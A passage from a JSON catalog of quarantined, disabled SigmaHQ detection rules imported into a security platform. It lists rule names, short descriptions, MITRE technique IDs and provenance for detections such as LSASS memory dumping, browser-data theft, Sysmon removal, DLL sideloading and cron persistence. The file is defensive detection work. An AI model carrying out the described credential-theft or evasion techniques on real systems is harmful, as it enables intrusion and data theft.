"69483748-1525-4a6c-95ca-90dc8d431b68", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_office_susp_child_processes.yml" } }, { "id": "sigmahq-sigma-696bfb54-227e-4602-ac5b-30d9d2053312", "type": "detection", "name": "Veeam Backup Database Suspicious Query", "description": "Detects potentially suspicious SQL queries using SQLCmd targeting the Veeam backup databases in order to steal information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/veeam-backup-database-suspicious-query.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "696bfb54-227e-4602-ac5b-30d9d2053312", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sqlcmd_veeam_db_recon.yml" } }, { "id": "sigmahq-sigma-6991bc2b-ae2e-447f-bc55-3a1ba04c14e5", "type": "detection", "name": "OpenCanary - FTP Login Attempt", "description": "Detects instances where an FTP service on an OpenCanary node has had a login attempt.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1021" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/opencanary-ftp-login-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6991bc2b-ae2e-447f-bc55-3a1ba04c14e5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/opencanary/opencanary_ftp_login_attempt.yml" } }, { "id": "sigmahq-sigma-69aeb277-f15f-4d2d-b32a-55e883609563", "type": "detection", "name": "Windows Event Auditing Disabled", "description": "Detects scenarios where system auditing (i.e.: Windows event log auditing) is disabled.\nThis may be used in a scenario where an entity would want to bypass local logging to evade detection when Windows event logging is enabled and reviewed.\nAlso, it is recommended to turn off \"Local Group Policy Object Processing\" via GPO, which will make sure that Active Directory GPOs take precedence over local/edited computer policies via something such as \"gpedit.msc\".\nPlease note, that disabling \"Local Group Policy Object Processing\" may cause an issue in scenarios of one off specific GPO modifications - however, it is recommended to perform these modifications in Active Directory anyways.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1685.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-event-auditing-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "69aeb277-f15f-4d2d-b32a-55e883609563", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_disable_event_auditing.yml" } }, { "id": "sigmahq-sigma-69b3bd1e-b38a-462f-9a23-fbdbf63d2294", "type": "detection", "name": "Github Fork Private Repositories Setting Enabled/Cleared", "description": "Detects when the policy allowing forks of private and internal repositories is changed (enabled or cleared).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1020", "T1537" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/github-fork-private-repositories-setting-enabled-cleared.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "69b3bd1e-b38a-462f-9a23-fbdbf63d2294", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/github/audit/github_fork_private_repos_enabled_or_cleared.yml" } }, { "id": "sigmahq-sigma-69bd9b97-2be2-41b6-9816-fb08757a4d1a", "type": "detection", "name": "Potentially Suspicious Execution From Parent Process In Public Folder", "description": "Detects a potentially suspicious execution of a parent process located in the \"\\Users\\Public\" folder executing a child process containing references to shell or scripting binaries and commandlines.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1564", "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-execution-from-parent-process-in-public-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "69bd9b97-2be2-41b6-9816-fb08757a4d1a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_execution_from_public_folder_as_parent.yml" } }, { "id": "sigmahq-sigma-69ca006d-b9a9-47f5-80ff-ecd4d25d481a", "type": "detection", "name": "HackTool - TruffleSnout Execution", "description": "Detects the use of TruffleSnout.exe an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low noise enumeration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1482" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-trufflesnout-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "69ca006d-b9a9-47f5-80ff-ecd4d25d481a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_trufflesnout.yml" } }, { "id": "sigmahq-sigma-69ca12af-119d-44ed-b50f-a47af0ebc364", "type": "detection", "name": "LSASS Process Memory Dump Creation Via Taskmgr.EXE", "description": "Detects the creation of an \"lsass.dmp\" file by the taskmgr process. This indicates a manual dumping of the LSASS.exe process memory using Windows Task Manager.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/lsass-process-memory-dump-creation-via-taskmgr-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "69ca12af-119d-44ed-b50f-a47af0ebc364", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_taskmgr_lsass_dump.yml" } }, { "id": "sigmahq-sigma-69ffc84e-8b1a-4024-8351-e018f66b8275", "type": "detection", "name": "FortiGate - User Group Modified", "description": "Detects the modification of a user group on a Fortinet FortiGate Firewall.\nThe group could be used to grant VPN access to a network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/fortigate-user-group-modified.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "69ffc84e-8b1a-4024-8351-e018f66b8275", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/fortinet/fortigate/fortinet_fortigate_user_group_modified.yml" } }, { "id": "sigmahq-sigma-6a50f16c-3b7b-42d1-b081-0fdd3ba70a73", "type": "detection", "name": "User Added To Root/Sudoers Group Using Usermod", "description": "Detects usage of the \"usermod\" binary to add users add users to the root or suoders groups", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/user-added-to-root-sudoers-group-using-usermod.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6a50f16c-3b7b-42d1-b081-0fdd3ba70a73", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_usermod_susp_group.yml" } }, { "id": "sigmahq-sigma-6a53d871-682d-40b6-83e0-b7c1a6c4e3a5", "type": "detection", "name": "PetitPotam Suspicious Kerberos TGT Request", "description": "Detect suspicious Kerberos TGT requests.\nOnce an attacer obtains a computer certificate by abusing Active Directory Certificate Services in combination with PetitPotam, the next step would be to leverage the certificate for malicious purposes.\nOne way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus.\nThis request will generate a 4768 event with some unusual fields depending on the environment.\nThis analytic will require tuning, we recommend filtering Account_Name to the Domain Controller computer accounts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1187" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/petitpotam-suspicious-kerberos-tgt-request.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6a53d871-682d-40b6-83e0-b7c1a6c4e3a5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_petitpotam_susp_tgt_request.yml" } }, { "id": "sigmahq-sigma-6a5f68d1-c4b5-46b9-94ee-5324892ea939", "type": "detection", "name": "Uninstall Sysinternals Sysmon", "description": "Detects the removal of Sysmon, which could be a potential attempt at defense evasion", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uninstall-sysinternals-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6a5f68d1-c4b5-46b9-94ee-5324892ea939", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sysinternals_sysmon_uninstall.yml" } }, { "id": "sigmahq-sigma-6a69f62d-ce75-4b57-8dce-6351eb55b362", "type": "detection", "name": "Esentutl Steals Browser Information", "description": "One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/esentutl-steals-browser-information.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6a69f62d-ce75-4b57-8dce-6351eb55b362", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_esentutl_webcache.yml" } }, { "id": "sigmahq-sigma-6a7ba45c-63d8-473e-9736-2eaabff79964", "type": "detection", "name": "AWS EFS Fileshare Mount Modified or Deleted", "description": "Detects when a EFS Fileshare Mount is modified or deleted. An adversary breaking any file system using the mount target that is being deleted, which might disrupt instances or applications using those mounts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-efs-fileshare-mount-modified-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6a7ba45c-63d8-473e-9736-2eaabff79964", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_efs_fileshare_mount_modified_or_deleted.yml" } }, { "id": "sigmahq-sigma-6aa12161-235a-4dfb-9c74-fe08df8d8da1", "type": "detection", "name": "Bitbucket Audit Log Configuration Updated", "description": "Detects changes to the bitbucket audit log configuration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bitbucket-audit-log-configuration-updated.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6aa12161-235a-4dfb-9c74-fe08df8d8da1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/bitbucket/audit/bitbucket_audit_log_configuration_update_detected.yml" } }, { "id": "sigmahq-sigma-6aa1d992-5925-4e9f-a49b-845e51d1de01", "type": "detection", "name": "New DLL Added to AppCertDlls Registry Key", "description": "Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key can be abused to obtain persistence and privilege escalation\nby causing a malicious DLL to be loaded and run in the context of separate processes on the computer.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.009" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-dll-added-to-appcertdlls-registry-key.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6aa1d992-5925-4e9f-a49b-845e51d1de01", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_event/registry_event_new_dll_added_to_appcertdlls_registry_key.yml" } }, { "id": "sigmahq-sigma-6ad91e31-53df-4826-bd27-0166171c8040", "type": "detection", "name": "Google Cloud Kubernetes Admission Controller", "description": "Identifies when an admission controller is executed in GCP Kubernetes.\nA Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server.\nThe behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster.\nAn adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster.\nFor example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod. An adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials.\nAn adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078", "T1552", "T1552.007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/google-cloud-kubernetes-admission-controller.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6ad91e31-53df-4826-bd27-0166171c8040", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/gcp/audit/gcp_kubernetes_admission_controller.yml" } }, { "id": "sigmahq-sigma-6adfbf8f-52be-4444-9bac-81b539624146", "type": "detection", "name": "Shell Execution via Find - Linux", "description": "Detects the use of the find command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or exploitation attempt.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1083" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/shell-execution-via-find-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6adfbf8f-52be-4444-9bac-81b539624146", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_find_shell_execution.yml" } }, { "id": "sigmahq-sigma-6ae53108-c3a0-4bee-8f45-c7591a2c337f", "type": "detection", "name": "Deployment AppX Package Was Blocked By AppLocker", "description": "Detects an appx package deployment that was blocked by AppLocker policy.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/deployment-appx-package-was-blocked-by-applocker.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6ae53108-c3a0-4bee-8f45-c7591a2c337f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_applocker_block.yml" } }, { "id": "sigmahq-sigma-6aef64e3-60c6-4782-8db3-8448759c714e", "type": "detection", "name": "Google Workspace Role Modified or Deleted", "description": "Detects when an a role is modified or deleted in Google Workspace.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/google-workspace-role-modified-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6aef64e3-60c6-4782-8db3-8448759c714e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/gcp/gworkspace/admin/gcp_gworkspace_role_modified_or_deleted.yml" } }, { "id": "sigmahq-sigma-6b14bac8-3e3a-4324-8109-42f0546a347f", "type": "detection", "name": "Scheduled Cron Task/Job - Linux", "description": "Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/scheduled-cron-task-job-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6b14bac8-3e3a-4324-8109-42f0546a347f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_schedule_task_job_cron.yml" } }, { "id": "sigmahq-sigma-6b269392-9eba-40b5-acb6-55c882b20ba6", "type": "detection", "name": "Suspicious File Drop by Exchange", "description": "Detects suspicious file type dropped by an Exchange component in IIS", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1505.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-file-drop-by-exchange.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6b269392-9eba-40b5-acb6-55c882b20ba6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_exchange_webshell_drop_suspicious.yml" } }, { "id": "sigmahq-sigma-6b369ced-4b1d-48f1-b427-fdc0de0790bd", "type": "detection", "name": "Suspicious Diantz Alternate Data Stream Execution", "description": "Compress target file into a cab file stored in the Alternate Data Stream (ADS) of the target file.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1564.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-diantz-alternate-data-stream-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6b369ced-4b1d-48f1-b427-fdc0de0790bd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_diantz_ads.yml" } }, { "id": "sigmahq-sigma-6b65c28e-11f3-46cb-902a-68f2cafaf474", "type": "detection", "name": "Odbcconf.EXE Suspicious DLL Location", "description": "Detects execution of \"odbcconf\" where the path of the DLL being registered is located in a potentially suspicious location.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218.008" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/odbcconf-exe-suspicious-dll-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6b65c28e-11f3-46cb-902a-68f2cafaf474", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_odbcconf_exec_susp_locations.yml" } }, { "id": "sigmahq-sigma-6b67c12e-5e40-47c6-b3b0-1e6b571184cc", "type": "detection", "name": "Google Cloud Service Account Modified", "description": "Identifies when a service account is modified in Google Cloud.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/google-cloud-service-account-modified.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6b67c12e-5e40-47c6-b3b0-1e6b571184cc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/gcp/audit/gcp_service_account_modified.yml" } }, { "id": "sigmahq-sigma-6b6976a3-b0e6-4723-ac24-ae38a737af41", "type": "detection", "name": "Potential Persistence Via Shim Database In Uncommon Location", "description": "Detects the installation of a new shim database where the file is located in a non-default location", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1546.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-shim-database-in-uncommon-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6b6976a3-b0e6-4723-ac24-ae38a737af41", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_persistence_shim_database_uncommon_location.yml" } }, { "id": "sigmahq-sigma-6b98b92b-4f00-4f62-b4fe-4d1920215771", "type": "detection", "name": "Potential DLL Sideloading Of Non-Existent DLLs From System Folders", "description": "Detects loading of specific system DLL files that are usually not present on the system (or at least not in system directories) but may be loaded by legitimate processes, potentially indicating phantom DLL hijacking attempts.\nPhantom DLL hijacking involves placing malicious DLLs with names of non-existent system binaries in locations where legitimate applications may search for them, leading to execution of the malicious DLLs.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-dll-sideloading-of-non-existent-dlls-from-system-folders.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6b98b92b-4f00-4f62-b4fe-4d1920215771", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_non_existent_dlls.yml" } }, { "id": "sigmahq-sigma-6ba5a05f-b095-4f0a-8654-b825f4f16334", "type": "detection", "name": "Potential MSTSC Shadowing Activity", "description": "Detects RDP session hijacking by using MSTSC shadowing", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1563.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-mstsc-shadowing-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6ba5a05f-b095-4f0a-8654-b825f4f16334", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_mstsc_rdp_hijack_shadowing.yml" } }, { "id": "sigmahq-sigma-6bba49bf-7f8c-47d6-a1bb-6b4dece4640e", "type": "detection", "name": "Suspicious RASdial Activity", "description": "Detects suspicious process related to rasdial.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-rasdial-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6bba49bf-7f8c-47d6-a1bb-6b4dece4640e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rasdial_execution.yml" } }, { "id": "sigmahq-sigma-6bd75993-9888-4f91-9404-e1e4e4e34b77", "type": "detection", "name": "HackTool - LocalPotato Execution", "description": "Detects the execution of the LocalPotato POC based on basic PE metadata information and default CLI examples", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-localpotato-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6bd75993-9888-4f91-9404-e1e4e4e34b77", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_localpotato.yml" } }, { "id": "sigmahq-sigma-6bfb8fa7-b2e7-4f6c-8d9d-824e5d06ea9e", "type": "detection", "name": "Invoke-Obfuscation VAR+ Launcher - PowerShell Module", "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", "version": "1.0.0", "author": 